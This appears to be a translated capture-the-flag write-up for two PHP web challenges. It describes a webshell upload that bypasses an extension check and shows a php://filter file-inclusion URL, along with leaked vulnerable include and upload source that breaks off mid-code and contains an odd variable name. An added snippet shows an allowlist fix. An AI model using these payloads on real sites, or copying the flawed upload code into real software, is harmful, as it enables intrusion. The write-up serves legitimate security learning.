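手速要快 (Be Quick)
The password is found in the response header.
Next, go to the upload page and upload a one-line PHP webshell, intercepting the request in Burp and appending .jpg to the file extension.
Requesting the uploaded file shows that it is parsed as PHP.
Get a shell and read the flag.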
flag{698539765730b69026796420b9201e03}
image_up
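After opening the site, the URL contains a page= parameter.
This suggests a file inclusion vulnerability.
Test the PHP stream wrappers (pseudo-protocols):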
http://101.71.29.5:10007/index.php?page=php://filter/convert.base64-encode/resource=index
This returns the source code:
<?php
if(isset($_GET['page'])){
    if(!stristr($_GET['page'],"..")){
        $page = $_GET['page'].".php";
        include($page);
    }else{
        header("Location: index.php?page=login");
    }
}else{
    header("Location: index.php?page=login");
}
The code appends .php to the page value taken from the URL.
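An added example, not part of the original writeup or the challenge's code: the `stristr(..., "..")` check above only blocks directory traversal, so the `php://filter` value passes it, while an exact-match allowlist rejects it. The names `resolve_page` and `ALLOWED_PAGES`, the allowed page names and the temporary page directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist; a real application would list its own pages.
const ALLOWED_PAGES = ['login', 'upload'];

// Returns the absolute path of the page script to include, or null to redirect.
function resolve_page($requested, string $pageDir): ?string
{
    // Exact-match allowlist: stream wrappers (php://, phar://, zip://),
    // traversal sequences and array parameters can never equal a name here.
    if (!is_string($requested) || !in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath($pageDir);
    $path = realpath($pageDir . '/' . $requested . '.php');
    // Defence in depth: the file must exist and resolve inside the page directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway page directory holding only login.php.
$dir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/login.php', "<?php echo 'login form';\n");

$samples = [
    'login',                                             // allowed and present
    'php://filter/convert.base64-encode/resource=index', // value from the URL above
    'upload',                                            // allowed, but missing in this demo
    'nosuchpage',                                        // constructed, not on the allowlist
];
foreach ($samples as $s) {
    $old = !stristr($s, '..');                 // the check from the source above
    $new = resolve_page($s, $dir) !== null;    // allowlist decision
    printf("%-52s original: %-8s allowlist: %s\n", $s,
        $old ? 'include' : 'redirect', $new ? 'include' : 'redirect');
}

unlink($dir . '/login.php');
rmdir($dir);
```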
A casual login attempt turns out to succeed, which leads to the upload page. Next, read the source of upload:
<?php
$error = "";
$exts = array("jpg","png","gif","jpeg");
if(!empty($_FILES["image"]))
{
    $temp = explode(".", $_FILES["image"]["name"]);
    $extension = end($temp);
    if((@$_upfileS["image"]["size"] < 102400))
    {
        if(in_array($extension,$exts)){
            $path = "uploads/".md5($temp[0].time()).".".$extension;
            move_uploaded_file($_FILES["image"]["tmp_name"], $path);
            $error = "上传成功!";
        }